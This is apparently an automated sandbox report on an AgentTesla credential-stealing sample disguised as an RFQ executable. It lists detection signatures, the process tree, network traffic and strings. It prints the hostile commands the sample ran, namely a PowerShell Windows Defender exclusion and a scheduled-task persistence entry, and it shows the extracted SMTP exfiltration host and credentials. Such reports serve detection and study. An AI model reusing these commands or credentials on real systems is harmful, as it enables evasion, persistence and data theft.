Loading ...

Play interactive tourEdit tour

Windows Analysis Report RFQ_99705546,99805546_Mark Cansick.exe

Overview

General Information

Sample Name:RFQ_99705546,99805546_Mark Cansick.exe
Analysis ID:492068
MD5:724bce9be00d521c9ae6075d50434b11
SHA1:a95a26499d30f48ca0b23e17b7273b1e6b92f8ac
SHA256:94bc5b095176ccf49917563287006f3efd903cac47d48e251f4f4554ee87c990
Tags:AgentTeslaexe
Infos:

Most interesting Screenshot:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Yara detected AntiVM3
Installs a global keyboard hook
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Powershell Defender Exclusion
.NET source code contains very large strings
Machine Learning detection for dropped file
Adds a directory exclusion to Windows Defender
Moves itself to temp directory
Tries to steal Mail credentials (via file access)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Uses schtasks.exe or at.exe to add and modify task schedules
Tries to harvest and steal browser information (history, passwords, etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Yara detected Credential Stealer
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Drops PE files
Detected TCP or UDP traffic on non-standard ports
Contains capabilities to detect virtual machines
Uses SMTP (mail sending)
Creates a window with clipboard capturing capabilities
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • RFQ_99705546,99805546_Mark Cansick.exe (PID: 6092 cmdline: 'C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exe' MD5: 724BCE9BE00D521C9AE6075D50434B11)
    • powershell.exe (PID: 4200 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exe' MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 4820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • schtasks.exe (PID: 1860 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\sucEaYWuNda' /XML 'C:\Users\user\AppData\Local\Temp\tmp1646.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 6308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Username": "user@regalbelloit.com", "Password": "OccWNGh9", "Host": "smtp.regalbelloit.com"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.313580243.0000000004563000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000000.00000002.313580243.0000000004563000.00000004.00000001.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
      00000008.00000002.814784422.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000008.00000002.814784422.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
          00000000.00000002.313035144.0000000004450000.00000004.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 8 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            8.2.RFQ_99705546,99805546_Mark Cansick.exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              8.2.RFQ_99705546,99805546_Mark Cansick.exe.400000.0.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                0.2.RFQ_99705546,99805546_Mark Cansick.exe.44f7b80.3.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  0.2.RFQ_99705546,99805546_Mark Cansick.exe.44f7b80.3.unpackJoeSecurity_AgentTesla_2Yara detected AgentTeslaJoe Security
                    0.2.RFQ_99705546,99805546_Mark Cansick.exe.44f7b80.3.raw.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                      Click to see the 1 entries

                      Sigma Overview

                      System Summary:

                      barindex
                      Sigma detected: Powershell Defender ExclusionShow sources
                      Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exe', CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exe', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exe' , ParentImage: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exe, ParentProcessId: 6092, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exe', ProcessId: 4200
                      Sigma detected: Non Interactive PowerShellShow sources
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exe', CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exe', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exe' , ParentImage: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exe, ParentProcessId: 6092, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exe', ProcessId: 4200
                      Sigma detected: T1086 PowerShell ExecutionShow sources
                      Source: Pipe createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: PipeName: \PSHost.132773237848034953.4200.DefaultAppDomain.powershell

                      Jbx Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Found malware configurationShow sources
                      Source: 0.2.RFQ_99705546,99805546_Mark Cansick.exe.44f7b80.3.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Username": "user@regalbelloit.com", "Password": "OccWNGh9", "Host": "smtp.regalbelloit.com"}
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: RFQ_99705546,99805546_Mark Cansick.exeVirustotal: Detection: 23%Perma Link
                      Machine Learning detection for sampleShow sources
                      Source: RFQ_99705546,99805546_Mark Cansick.exeJoe Sandbox ML: detected
                      Machine Learning detection for dropped fileShow sources
                      Source: C:\Users\user\AppData\Roaming\sucEaYWuNda.exeJoe Sandbox ML: detected
                      Source: 8.2.RFQ_99705546,99805546_Mark Cansick.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8
                      Source: RFQ_99705546,99805546_Mark Cansick.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                      Source: RFQ_99705546,99805546_Mark Cansick.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

                      Networking:

                      barindex
                      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                      Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.3:49822 -> 208.91.198.143:587
                      Source: TrafficSnort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.3:49823 -> 208.91.198.143:587
                      Source: Joe Sandbox ViewIP Address: 208.91.198.143 208.91.198.143
                      Source: global trafficTCP traffic: 192.168.2.3:49822 -> 208.91.198.143:587
                      Source: global trafficTCP traffic: 192.168.2.3:49822 -> 208.91.198.143:587
                      Source: RFQ_99705546,99805546_Mark Cansick.exe, 00000008.00000002.816654830.0000000003241000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
                      Source: RFQ_99705546,99805546_Mark Cansick.exe, 00000008.00000002.816654830.0000000003241000.00000004.00000001.sdmpString found in binary or memory: http://DynDns.comDynDNS
                      Source: RFQ_99705546,99805546_Mark Cansick.exe, 00000008.00000002.816654830.0000000003241000.00000004.00000001.sdmpString found in binary or memory: http://PFjgsH.com
                      Source: RFQ_99705546,99805546_Mark Cansick.exe, 00000008.00000002.818569179.000000000355F000.00000004.00000001.sdmpString found in binary or memory: http://POrzfIODYEW.o
                      Source: RFQ_99705546,99805546_Mark Cansick.exe, 00000008.00000002.816654830.0000000003241000.00000004.00000001.sdmpString found in binary or memory: http://POrzfIODYEW.org
                      Source: RFQ_99705546,99805546_Mark Cansick.exe, 00000000.00000002.310875306.0000000004179000.00000004.00000001.sdmpString found in binary or memory: http://schemas.microsoft.
                      Source: RFQ_99705546,99805546_Mark Cansick.exe, 00000000.00000002.309447811.0000000003171000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: RFQ_99705546,99805546_Mark Cansick.exe, 00000008.00000002.818706292.00000000035A7000.00000004.00000001.sdmpString found in binary or memory: http://smtp.regalbelloit.com
                      Source: RFQ_99705546,99805546_Mark Cansick.exe, 00000008.00000002.818706292.00000000035A7000.00000004.00000001.sdmpString found in binary or memory: http://us2.smtp.mailhostbox.com
                      Source: RFQ_99705546,99805546_Mark Cansick.exe, 00000008.00000002.816654830.0000000003241000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.org%$
                      Source: RFQ_99705546,99805546_Mark Cansick.exe, 00000008.00000002.816654830.0000000003241000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.org%GETMozilla/5.0
                      Source: RFQ_99705546,99805546_Mark Cansick.exe, 00000000.00000002.313580243.0000000004563000.00000004.00000001.sdmp, RFQ_99705546,99805546_Mark Cansick.exe, 00000008.00000002.814784422.0000000000402000.00000040.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
                      Source: RFQ_99705546,99805546_Mark Cansick.exe, 00000008.00000002.816654830.0000000003241000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
                      Source: unknownDNS traffic detected: queries for: smtp.regalbelloit.com

                      Key, Mouse, Clipboard, Microphone and Screen Capturing:

                      barindex
                      Installs a global keyboard hookShow sources
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exe
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeWindow created: window name: CLIPBRDWNDCLASS

                      System Summary:

                      barindex
                      .NET source code contains very large stringsShow sources
                      Source: RFQ_99705546,99805546_Mark Cansick.exe, UX.WinForms/Api/NativeWindowHook.csLong String: Length: 75776
                      Source: sucEaYWuNda.exe.0.dr, UX.WinForms/Api/NativeWindowHook.csLong String: Length: 75776
                      Source: RFQ_99705546,99805546_Mark Cansick.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeCode function: 0_2_0306C154
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeCode function: 0_2_0306E588
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeCode function: 0_2_0306E598
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeCode function: 0_2_06280D06
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeCode function: 0_2_06280007
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeCode function: 0_2_06280040
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeCode function: 8_2_01395140
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeCode function: 8_2_0139A940
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeCode function: 8_2_0139D9B0
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeCode function: 8_2_0139C820
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeCode function: 8_2_0139DF10
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeCode function: 8_2_01397BB0
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeCode function: 8_2_0139CE40
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeCode function: 8_2_013926F8
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeCode function: 8_2_0139BB70
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeCode function: 8_2_01399F68
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeCode function: 8_2_0139EB98
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeCode function: 8_2_01704860
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeCode function: 8_2_01704790
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeCode function: 8_2_01704853
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeCode function: 8_2_01704810
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeCode function: 8_2_069A2A48
                      Source: RFQ_99705546,99805546_Mark Cansick.exe, 00000000.00000002.308753218.0000000000D70000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameManifestBuild.exe> vs RFQ_99705546,99805546_Mark Cansick.exe
                      Source: RFQ_99705546,99805546_Mark Cansick.exe, 00000000.00000002.310875306.0000000004179000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameCF_Secretaria.dll< vs RFQ_99705546,99805546_Mark Cansick.exe
                      Source: RFQ_99705546,99805546_Mark Cansick.exe, 00000000.00000002.309447811.0000000003171000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamenygnQNWysOyGezfGURempgHEbPWt.exe4 vs RFQ_99705546,99805546_Mark Cansick.exe
                      Source: RFQ_99705546,99805546_Mark Cansick.exe, 00000008.00000000.307855603.0000000000E50000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameManifestBuild.exe> vs RFQ_99705546,99805546_Mark Cansick.exe
                      Source: RFQ_99705546,99805546_Mark Cansick.exe, 00000008.00000002.815843920.000000000158A000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs RFQ_99705546,99805546_Mark Cansick.exe
                      Source: RFQ_99705546,99805546_Mark Cansick.exe, 00000008.00000002.814784422.0000000000402000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamenygnQNWysOyGezfGURempgHEbPWt.exe4 vs RFQ_99705546,99805546_Mark Cansick.exe
                      Source: RFQ_99705546,99805546_Mark Cansick.exe, 00000008.00000002.815041802.0000000000FE8000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs RFQ_99705546,99805546_Mark Cansick.exe
                      Source: RFQ_99705546,99805546_Mark Cansick.exeBinary or memory string: OriginalFilenameManifestBuild.exe> vs RFQ_99705546,99805546_Mark Cansick.exe
                      Source: RFQ_99705546,99805546_Mark Cansick.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: sucEaYWuNda.exe.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: RFQ_99705546,99805546_Mark Cansick.exeVirustotal: Detection: 23%
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeFile read: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeJump to behavior
                      Source: RFQ_99705546,99805546_Mark Cansick.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: unknownProcess created: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exe 'C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exe'
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exe'
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\sucEaYWuNda' /XML 'C:\Users\user\AppData\Local\Temp\tmp1646.tmp'
                      Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeProcess created: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exe C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exe
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exe'
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\sucEaYWuNda' /XML 'C:\Users\user\AppData\Local\Temp\tmp1646.tmp'
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeProcess created: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exe C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exe
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeFile created: C:\Users\user\AppData\Roaming\sucEaYWuNda.exeJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeFile created: C:\Users\user\AppData\Local\Temp\tmp1646.tmpJump to behavior
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@9/9@2/1
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeMutant created: \Sessions\1\BaseNamedObjects\zsyzUqlfpBEWVDBDRQl
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6308:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4820:120:WilError_01
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                      Source: RFQ_99705546,99805546_Mark Cansick.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: RFQ_99705546,99805546_Mark Cansick.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

                      Data Obfuscation:

                      barindex
                      .NET source code contains potential unpackerShow sources
                      Source: RFQ_99705546,99805546_Mark Cansick.exe, UX.WinForms/Form1.cs.Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: sucEaYWuNda.exe.0.dr, UX.WinForms/Form1.cs.Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeCode function: 0_2_00CE4CCD push ds; retf
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeCode function: 8_2_00DC4CCD push ds; retf
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeCode function: 8_2_0170D331 push esp; iretd
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.27876298781
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.27876298781
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeFile created: C:\Users\user\AppData\Roaming\sucEaYWuNda.exeJump to dropped file

                      Boot Survival:

                      barindex
                      Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\sucEaYWuNda' /XML 'C:\Users\user\AppData\Local\Temp\tmp1646.tmp'

                      Hooking and other Techniques for Hiding and Protection:

                      barindex
                      Moves itself to temp directoryShow sources
                      Source: c:\users\user\desktop\rfq_99705546,99805546_mark cansick.exeFile moved: C:\Users\user\AppData\Local\Temp\tmpG864.tmpJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\RFQ_99705546,99805546_Mark Cansick.exeProcess information set: NOOPENFILEERRORBOX
